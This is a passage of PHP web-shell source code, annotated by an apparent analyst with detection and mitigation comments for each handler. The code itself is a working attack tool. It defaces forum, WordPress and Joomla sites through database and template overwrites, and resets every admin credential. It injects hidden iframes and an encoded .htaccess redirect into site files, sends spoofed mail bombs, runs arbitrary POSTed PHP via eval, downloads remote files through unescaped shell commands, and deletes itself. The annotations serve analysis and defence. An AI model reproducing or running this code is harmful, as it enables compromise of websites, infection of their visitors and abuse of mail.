1906 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1907 else
1908 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1909 if($sql)
1910 {
1911 mysql_close($con);
1912 echo "<font class=txt>Password Changed Successfully</font>";
1913 }
1914 else
1915 echo "Cannot Change Password";
1916 }
1917}
1918else if(isset($_POST['forumdeface']))
1919{
 // Analyst note: content-overwrite ("deface") handler that works through the
 // site's own database rather than the filesystem. DB host/name/user/password
 // (f1..f4), the replacement content ('index') and the table prefix are read
 // from $_POST and interpolated into SQL unescaped.
 // $_POST['forumdeface'] selects the target: vb, mybb, smf, ipb, wp, joomla.
 // Detection: look for bulk UPDATEs on template/board/post tables in DB audit
 // or binary logs, and for the marker strings noted per branch below.
 // Mitigation: a least-privilege DB account for the web application and
 // tested backups of template and content tables.
1920 $localhost = $_POST['f1'];
1921 $database = $_POST['f2'];
1922 $username = $_POST['f3'];
1923 $password = $_POST['f4'];
1924 $index = $_POST['index'];
1925 $prefix = $_POST['tableprefix'];
1926
1927 if($_POST['forumdeface'] == "vb")
1928 {
 // vb: the UPDATE has no WHERE clause, so every row of the template table is
 // replaced with a string that wraps eval(base64_decode('...')) in the
 // {${ ... }} form and ends with exit(). Rows in the template table that
 // contain "eval(base64_decode(" are the indicator to search for.
1929 $con =@ mysql_connect($localhost,$username,$password);
1930 $db =@ mysql_select_db($database,$con);
1931 $index=str_replace('"','\\"',$index);
1932 $attack = "{\${eval(base64_decode(\'";
1933 $attack .= base64_encode("echo \"$index\";");
1934 $attack .= "\'))}}{\${exit()}}</textarea>";
1935 if($prefix == "" || $prefix == null)
1936 $query = "UPDATE template SET template = '$attack'";
1937 else
1938 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1939 $result =@ mysql_query($query,$con);
1940 if($result)
1941 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1942 else
1943 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1944 }
1945 else if($_POST['forumdeface'] == "mybb")
1946 {
 // mybb: same template-table overwrite as the vb branch, again without WHERE.
1947 $con =@ mysql_connect($localhost,$username,$password);
1948 $db =@ mysql_select_db($database,$con);
1949 $attack = "{\${eval(base64_decode(\'";
1950 $attack .= base64_encode("echo \"$index\";");
1951 $attack .= "\'))}}{\${exit()}}</textarea>";
1952 $attack = str_replace('"',"\\'",$attack);
1953
1954 if($prefix == "" || $prefix == null)
1955 $query = "UPDATE mybb_templates SET template = '$attack'";
1956 else
1957 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1958 $result =@ mysql_query($query,$con);
1959 if($result)
1960 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1961 else
1962 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1963 }
1964 else if($_POST['forumdeface'] == "smf")
1965 {
 // smf: rewrites name/description of boards in one category (id_cat = f5).
1966 $head = $_POST['head'];
1967 $catid = $_POST['f5'];
1968
1969 $con =@ mysql_connect($localhost,$username,$password);
1970 $db =@ mysql_select_db($database,$con);
1971 if($prefix == "" || $prefix == null)
1972 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1973 else
1974 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1975 $result =@ mysql_query($query,$con);
1976 if($result)
1977 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1978 else
1979 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1980 }
1981 else if($_POST['forumdeface'] == "ipb")
1982 {
 // ipb: rewrites name/description of one row of the forums table (id = f5).
1983 $head = $_POST['head'];
1984 $catid = $_POST['f5'];
1985
1986 $IPB = "forums";
1987 $con =@ mysql_connect($localhost,$username,$password);
1988 $db =@ mysql_select_db($database,$con);
1989 if($prefix == "" || $prefix == null)
1990 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1991 else
1992 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1993 if($result)
1994 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1995 else
1996 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1997 }
1998 else if($_POST['forumdeface'] == "wp")
1999 {
 // wp: rewrites post_title/post_content, either for one post ID or, when the
 // 'alll' parameter equals "All", for every row of the posts table.
2000 $catid = $_POST['f5'];
2001 $head = $_POST['head'];
2002
2003 $con =@ mysql_connect($localhost,$username,$password);
2004 $db =@ mysql_select_db($database,$con);
2005 if($prefix == "" || $prefix == null)
2006 {
2007 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2008 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2009 else
2010 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2011 }
2012 else
2013 {
2014 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2015 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2016 else
2017 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2018
2019 }
2020 $result =@mysql_query($query,$con) or mysql_error();
2021 if($result)
2022 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2023 else
2024 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2025 }
2026 else if($_POST['forumdeface'] == "joomla")
2027 {
 // joomla: this branch continues past the two helper functions declared
 // below. $h is a short PHP snippet that echoes the base64-decoded 'index'
 // content and exits; it is later submitted as template source.
2028 $site_url = $_POST['siteurl'];
2029 $dbprefix = $_POST['tableprefix'];
2030 $dbname = $_POST['f2'];
2031 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2032
2033 function randomt()
2034 {
 // Analyst note: returns an 8-character string (loop runs for $i = 0..7).
 // Characters come from lowercase letters without 'l' and digits without '1';
 // the index is rand() % 33 over a 34-character alphabet, so the final
 // character of $chars ('9') is never selected.
 // The generator is rand() seeded from microtime(), i.e. not a
 // cryptographic source. In this file the result is used as a file name, so
 // stray 8-character names matching that alphabet are worth checking for.
2035 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2036 srand((double)microtime()*1000000);
2037 $i = 0;
2038 $pass = '' ;
2039
2040 while ($i <= 7)
2041 {
2042 $num = rand() % 33;
2043 $tmp = substr($chars, $num, 1);
2044 $pass = $pass . $tmp;
2045 $i++;
2046 }
2047
2048 return $pass;
2049 }
2050 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2051 {
 // Analyst note: plain-text scraper. Splits $text on the start marker, takes
 // piece number $i, splits that on the end marker and returns the trimmed
 // first part. There is no check that piece $i exists.
 // Callers in this file use it to pull hidden form-field names and values
 // out of fetched HTML.
2052 $ar0=explode($marqueurDebutLien, $text);
2053 $ar1=explode($marqueurFinLien, $ar0[$i]);
2054 $ar=trim($ar1[0]);
2055 return $ar;
2056 }
2057 $co=randomt();
 // Analyst note: remainder of the Joomla branch. $co is used below only as the
 // CURLOPT_COOKIEJAR / CURLOPT_COOKIEFILE path, i.e. a relative file name with
 // a random 8-character name.
 // Sequence visible in this block:
 //   1. overwrite credentials in the users table;
 //   2. log in over HTTP to $site_url/index.php with those credentials;
 //   3. open the template source editor and submit $h as the new index.php.
 // $useragent is not assigned anywhere in this block.
 // Indicators: every users row sharing username 'admin' and the identical
 // hash:salt value written below; an administrator login originating from the
 // web server's own address followed by a com_templates source save; a
 // template index.php that starts with "<? echo(stripslashes(base64_decode(".
 // Mitigation: restrict the administrator URL by network or second factor,
 // keep template directories read-only for the PHP user, and monitor the
 // users table for mass updates.
2058
2059 $link=mysql_connect($localhost,$username,$password) ;
2060 mysql_select_db($dbname,$link);
2061
 // No WHERE clause: every account row receives the same username and hash.
 // NOTE(review): the login request further down sends passwd=123456789, so
 // this hash presumably corresponds to that value - not verifiable from here.
2062 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2063
 // Probe query: success selects the first flow (extensions/template_styles
 // tables), failure the else flow (templates_menu table). Presumably this
 // separates two Joomla schema generations - confirm.
2064 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2065
2066 if ( $req )
2067 {
2068 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2069 $data = mysql_fetch_array($req);
2070 $template_name=$data["template"];
2071
2072 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2073 $data = mysql_fetch_array($req);
2074 $template_id=$data["extension_id"];
2075
2076 $url2=$site_url."/index.php";
2077
 // First request: fetch the login page to scrape the hidden form fields.
2078 $ch = curl_init();
2079 curl_setopt($ch, CURLOPT_URL, $url2);
2080 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2081 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2082 curl_setopt($ch, CURLOPT_HEADER, 1);
2083 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2084 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2085 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2086
2087
2088 $buffer = curl_exec($ch);
2089
2090 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2091 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2092
2093
 // Second request: submit the login form with the overwritten credentials.
2094 $url2=$site_url."/index.php";
2095 $ch = curl_init();
2096 curl_setopt($ch, CURLOPT_URL, $url2);
2097 curl_setopt($ch, CURLOPT_POST, 1);
2098 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2099 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2100 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2101 curl_setopt($ch, CURLOPT_HEADER, 0);
2102 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2103 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2104 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2105 $buffer = curl_exec($ch);
2106
 // Login is treated as successful when the response mentions "com_config".
2107 $pos = strpos($buffer,"com_config");
2108 if($pos === false)
2109 {
2110 echo("<br>[-] Login Error");
2111 exit;
2112 }
2113
 // Third request: open the template's index.php in the source editor.
2114 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2115 $ch = curl_init();
2116 curl_setopt($ch, CURLOPT_URL, $url2);
2117 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2118 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2119 curl_setopt($ch, CURLOPT_HEADER, 0);
2120 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2121 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2122
2123 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2124 $buffer = curl_exec($ch);
2125
2126 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2127 if(!$hidden2)
2128 {
2129 echo("<br>[-] index.php Not found in Theme Editor");
2130 exit;
2131 }
2132
 // Fourth request: save $h as the template's index.php source.
2133 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2134
2135 $ch = curl_init();
2136 curl_setopt($ch, CURLOPT_URL, $url2);
2137 curl_setopt($ch, CURLOPT_POST, 1);
2138 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2139
2140 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2141 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2142 curl_setopt($ch, CURLOPT_HEADER, 0);
2143 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2144 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2145 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2146 $buffer = curl_exec($ch);
2147
2148 $pos = strpos($buffer,'<dd class="message message">');
2149 if($pos === false)
2150 {
2151 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2152 }
2153 else
2154 {
2155 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2156 }
2157 }
2158 else
2159 {
 // Alternate flow: same four HTTP steps, but the template is identified by
 // name from the templates_menu table and saved with task=save_source.
2160 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2161 $data = mysql_fetch_array($req);
2162 $template_name=$data["template"];
2163
2164 $url2=$site_url."/index.php";
2165 $ch = curl_init();
2166 curl_setopt($ch, CURLOPT_URL, $url2);
2167 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2168 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2169 curl_setopt($ch, CURLOPT_HEADER, 1);
2170 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2171 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2172 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2173 $buffer = curl_exec($ch);
2174
2175 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2176
2177 $url2=$site_url."/index.php";
2178 $ch = curl_init();
2179 curl_setopt($ch, CURLOPT_URL, $url2);
2180 curl_setopt($ch, CURLOPT_POST, 1);
2181 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2182 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2183 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2184 curl_setopt($ch, CURLOPT_HEADER, 0);
2185 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2186 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2187 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2188 $buffer = curl_exec($ch);
2189
2190 $pos = strpos($buffer,"com_config");
2191
2192 if($pos === false)
2193 {
2194 echo("<br>[-] Login Error");
2195 exit;
2196 }
2197
2198 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2199 $ch = curl_init();
2200 curl_setopt($ch, CURLOPT_URL, $url2);
2201 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2202 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2203 curl_setopt($ch, CURLOPT_HEADER, 0);
2204 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2205 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2206 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2207 $buffer = curl_exec($ch);
2208
2209 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2210
2211 if(!$hidden2)
2212 {
2213 echo("<br>[-] index.php Not found in Theme Editor");
2214 }
2215
2216 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2217 $ch = curl_init();
2218 curl_setopt($ch, CURLOPT_URL, $url2);
2219 curl_setopt($ch, CURLOPT_POST, 1);
2220 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2221 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2222 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2223 curl_setopt($ch, CURLOPT_HEADER, 0);
2224 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2225 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2226 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2227 $buffer = curl_exec($ch);
2228
2229 $pos = strpos($buffer,'<dd class="message message fade">');
2230 if($pos === false)
2231 {
2232 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2233 exit;
2234 }
2235 else
2236 {
2237 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2238 }
2239 }
2240 }
2241}
2242else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2243{
 // Analyst note: bulk file-modification handler. For every file matching
 // <pathtomass>/*.<filetype> it writes the POSTed 'injectthis' content, in
 // append mode by default or truncating the file when mode is 'Overwriter'.
 // Only the shell's own file (__FILE__) is skipped.
 // $directorysperator is defined outside this block; the fopen() handles are
 // never closed here.
 // Detection: many files of one extension in a directory sharing the same
 // modification time and the same trailing bytes; file-integrity monitoring
 // on the web root catches this directly.
 // Mitigation: the PHP worker should not have write permission on
 // application code.
2244 $filetype = $_POST['filetype'];
2245
2246 $mode = "a";
2247
2248 if($_POST['mode'] == 'Apender')
2249 $mode = "a";
2250
2251 if($_POST['mode'] == 'Overwriter')
2252 $mode = "w";
2253
2254 if (is_dir($_POST['pathtomass']))
2255 {
2256 $lolinject = $_POST['injectthis'];
2257 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2258 if(substr($_POST['pathtomass'], -1) == "\\")
2259 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2260 foreach (glob($mypath) as $injectj00)
2261 {
2262 if($injectj00 == __FILE__)
2263 continue;
2264 $fp=fopen($injectj00,$mode);
2265 if (fputs($fp,$lolinject))
2266 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2267 else
2268 echo 'failed to inject '.$injectj00.'<br>';
2269 }
2270 }
2271 else
2272 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2273}
2274else if(isset($_POST['mailfunction']))
2275{
 // Analyst note: mail-abuse handler built on PHP's mail().
 // "dobombing" sends the same message 'times' times to one recipient with a
 // forged From address at whitehouse.gov; when 'padding' is set, random
 // numbers are added to the sender, subject and body of each copy.
 // "massmailing" sends a single message and takes the From value straight
 // from the request, concatenated into the header string unfiltered.
 // Detection: a spike of local mail submissions from the web-server user,
 // and queue entries with the forged sender pattern above.
 // Mitigation: rate-limit or block mail submission from the web tier, and
 // add mail to disable_functions where the site does not send mail itself.
2276 if($_POST['mailfunction'] == "dobombing")
2277 {
2278 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2279 {
2280 $times = $_POST['times'];
2281 while($times--)
2282 {
2283 if(isset($_POST['padding']))
2284 {
2285 $fromPadd = rand(0,9999);
2286 $subjectPadd = " -- ID : ".rand(0,9999999);
2287 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2288
2289 }
2290 $from = "president$fromPadd@whitehouse.gov";
2291 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2292 {
2293 $error = 1;
2294 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2295 break;
2296 }
2297 }
2298 if($error != 1)
2299 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2300 }
2301 }
2302 else if($_POST['mailfunction'] == "massmailing")
2303 {
2304 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2305 {
2306 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2307 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2308 else
2309 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2310 }
2311 }
2312}
2313else if(isset($_POST['code']))
2314{
 // Analyst note: arbitrary PHP execution. The POSTed 'code' value has the
 // "<?php", "<?" and "?>" markers stripped and is then passed to eval(); it
 // runs with the privileges of the web-server user.
 // htmlspecialchars() here wraps eval()'s return value and its own result is
 // discarded, so nothing printed by the evaluated code is escaped.
 // The two branches differ only in the surrounding markup ('intext' true
 // renders inside a textarea, false inside a font element).
 // Detection: POST requests carrying both 'code' and 'intext' parameters;
 // static scanners should flag eval() fed from $_POST.
 // Mitigation caveat: eval is a language construct, so disable_functions
 // does not block it; prevention has to come from keeping the file off the
 // server (upload controls, read-only web root, integrity monitoring).
2315 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2316 {
2317 // FIlter Some Chars we dont need
2318 ?><br>
2319 <textarea name="code" class="box" cols="120" rows="10"><?php
2320 $code = str_replace("<?php","",$_POST['code']);
2321 $code = str_replace("<?","",$code);
2322 $code = str_replace("?>","",$code);
2323
2324 // Evaluate PHP CoDE!
2325 htmlspecialchars(eval($code));
2326 ?>
2327 </textarea><?php
2328 }
2329 else if($_POST['code'] != null && $_POST['intext'] == "false")
2330 {
2331 $code = str_replace("<?php","",$_POST['code']);
2332 $code = str_replace("<?","",$code);
2333 $code = str_replace("?>","",$code);
2334
2335 // Evaluate PHP CoDE!
2336 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2337 }
2338}
2339else if(isset($_GET['infect']))
2340{
 // Analyst note: appends a zero-size iframe to site files so that visitors'
 // browsers load a third-party URL. $malsite is defined outside this block.
 // Targets are *.php, *.htm and *.html under $_GET['path']; the shell's own
 // file is skipped only in the *.php loop.
 // Indicator: files ending with the literal text
 //   <iframe width=0px height=0px frameborder=no name=frame1 src=
 // A recursive search of the web root for that string finds affected files.
 // Remediation: restore the files from a known-good copy rather than editing
 // them in place, then locate and remove the shell and close the entry point.
2341 $coun = 0;
2342 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2343 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2344 {
2345 if($injectj00 == __FILE__)
2346 continue;
2347 if($myfile=fopen($injectj00,'a'))
2348 {
2349 fputs($myfile, $str);
2350 fclose($myfile);
2351 $coun = 1;
2352 }
2353 }
2354 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2355 {
2356 if($myfile=fopen($injectj00,'a'))
2357 {
2358 fputs($myfile, $str);
2359 fclose($myfile);
2360 $coun = 1;
2361 }
2362 }
2363 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2364 {
2365 if($myfile=fopen($injectj00,'a'))
2366 {
2367 fputs($myfile, $str);
2368 fclose($myfile);
2369 $coun = 1;
2370 }
2371 }
2372
2373
2374 if($coun == 1)
2375 echo "<center>Done !!!!<center>";
2376 else
2377 echo "<center>Cannot open files !!!!<center>";
2378}
2379else if(isset($_GET['redirect']))
2380{
 // Analyst note: appends a packed payload to the .htaccess file in the
 // current directory. $mal is base64 text that is zlib-decompressed before
 // being written; its decoded content is not shown in this listing.
 // NOTE(review): the menu entry that triggers this is labelled "Redirect
 // Search Engine TO Malwared site", so the payload is presumably a set of
 // rewrite rules keyed on search-engine referrers or crawlers - confirm by
 // decoding in an isolated analysis environment.
 // Detection: unexpected growth or recent modification of .htaccess files,
 // especially rules that visitors arriving directly never trigger.
 // Mitigation: set AllowOverride None where per-directory overrides are not
 // needed and keep .htaccess unwritable by the PHP user.
2381 if($myfile = fopen(".htaccess",'a'))
2382 {
2383 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2384 fwrite($myfile, gzuncompress(base64_decode($mal)));
2385 fwrite($myfile, "\n\r");
2386 fclose($myfile);
2387 echo "<center>Done !!!!<center>";
2388 }
2389 else
2390 echo "<center>Cannot open file !!!!<center>";
2391}
2392else if(isset($_GET['malware']))
 // Analyst note: menu fragment only. It renders two links that call the
 // client-side function malwarefun() (defined outside this block) with
 // 'infect' or 'redirect', matching the two request handlers of the same
 // names. $_GET["dir"] is echoed into the hidden field without escaping.
2393{ ?>
2394 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2395 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2396 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2397 <div id="showmal"></div>
2398 <?php
2399}
2400else if(isset($_GET['codeinsert']))
2401{
 // Analyst note: reads the .htaccess file of the current directory and shows
 // it in a textarea; the Insert button calls the client-side codeinsert()
 // function (defined outside this block) with the textarea value.
 // The file content is echoed without escaping and the handle is not closed.
 // Exposure: .htaccess can hold access rules and auth file locations, so
 // this discloses server configuration to whoever operates the shell.
2402 if($file1 = fopen(".htaccess",'r'))
2403 {
2404 ?><div id="showcode"></div>
2405 <form method=post>
2406 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2407 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2408 </form>
2409 <?php }
2410 else
2411 echo "<center>Cannot Open File!!</center>";
2412}
2413else if(isset($_POST['getcode']))
2414{
 // Analyst note: appends the POSTed 'getcode' text verbatim to .htaccess in
 // the current directory, followed by "\n\r". Because Apache re-reads
 // .htaccess per request, appended directives take effect immediately.
 // Detection and mitigation are the same as for any .htaccess tampering:
 // change monitoring on those files, AllowOverride None where possible, and
 // no write permission for the PHP user.
2415 if($myfile = fopen(".htaccess",'a'))
2416 {
2417 fwrite($myfile, $_POST['getcode']);
2418 fwrite($myfile, "\n\r");
2419 fclose($myfile);
2420 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2421 }
2422 else
2423 echo "Permission Denied";
2424}
2425else if(isset($_GET['uploadurl']))
2426{
 // Analyst note: entry point of the remote-fetch feature. The download tool
 // ('functiontype'), source URL ('wurl') and destination directory ('path')
 // all come from the query string; magicboom() is defined outside this block.
2427 $functiontype = trim($_GET['functiontype']);
2428 $wurl = trim($_GET['wurl']);
2429 $path = magicboom($_GET['path']);
2430
2431 function remotedownload($cmd,$url)
2432 {
 // Analyst note: fetches a remote file by shelling out to whichever
 // downloader $cmd names (wget, lynx, fetch, links, GET or curl). The command
 // line is built by plain string concatenation of $url and its basename, with
 // no shell escaping, and handed to execmd(); which() and execmd() are
 // defined outside this block.
 // Returns the basename of $url whether or not anything was downloaded.
 // Detection: the web-server user spawning wget/curl/lynx/fetch/links is a
 // strong signal on most hosts; process-execution auditing (auditd, EDR)
 // records it together with the fetched URL.
 // Mitigation: block command execution from PHP via disable_functions where
 // the application does not need it, and restrict outbound HTTP from the
 // web tier.
2433 $namafile = basename($url);
2434 switch($cmd)
2435 {
2436 case 'wwget':
2437 execmd(which('wget')." ".$url." -O ".$namafile);
2438 break;
2439 case 'wlynx':
2440 execmd(which('lynx')." -source ".$url." > ".$namafile);
2441 break;
2442 case 'wfread' :
2443 execmd($wurl,$namafile);
2444 break;
2445 case 'wfetch' :
2446 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2447 break;
2448 case 'wlinks' :
2449 execmd(which('links')." -source ".$url." > ".$namafile);
2450 break;
2451 case 'wget' :
2452 execmd(which('GET')." ".$url." > ".$namafile);
2453 break;
2454 case 'wcurl' :
2455 execmd(which('curl')." ".$url." -o ".$namafile);
2456 break;
2457 default:
2458 break;
2459 }
2460 return $namafile;
2461 }
2462 $namafile = remotedownload($functiontype,$wurl);
 // Analyst note: success is judged only by whether a file with the URL's
 // basename now exists under $path; $directorysperator is defined outside
 // this block. New files appearing in web-served directories shortly after a
 // request carrying 'uploadurl' are the artefact to look for.
2463 $fullpath = $path . $directorysperator . $namafile;
2464 if(is_file($fullpath))
2465 {
2466 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2467 }
2468 else
2469 echo "<center>Failed to upload $namafile</center>";
2470}
2471else if(isset($_GET['createfolder']))
2472{
 // Analyst note: creates a directory at the path given in the query string,
 // with no restriction on location beyond filesystem permissions.
2473 if(!mkdir($_GET['createfolder']))
2474 echo "Failed To create";
2475 else
2476 echo "<font class=txt>Folder Created Successfully</font>";
2477}
2478else if(isset($_GET['selfkill']))
2479{
 // Analyst note: self-removal. The shell deletes its own file on request, so
 // the absence of the file during incident response does not show the host
 // was never compromised. Rely on access logs (requests with 'selfkill' in
 // the query string), file-integrity history and backups to establish what
 // was present, and review the other changes this tool can make.
2480 if(unlink(__FILE__))
2481 echo "<br><center><font size=5>Good Bye......</font></center>";
2482 else
2483 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2484}
2485else if(isset($_GET['Create']))
2486{
 // Analyst note: form fragment for the file-creation feature. The target
 // path from $_GET['Create'] is echoed into a hidden field without escaping;
 // the Save button calls the client-side createfile() function (defined
 // outside this block), which feeds the 'filecreator'/'filecontent' handler.
2487 ?>
2488 <form method="post">
2489 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2490 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2491 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2492 </form>
2493
2494<?php }
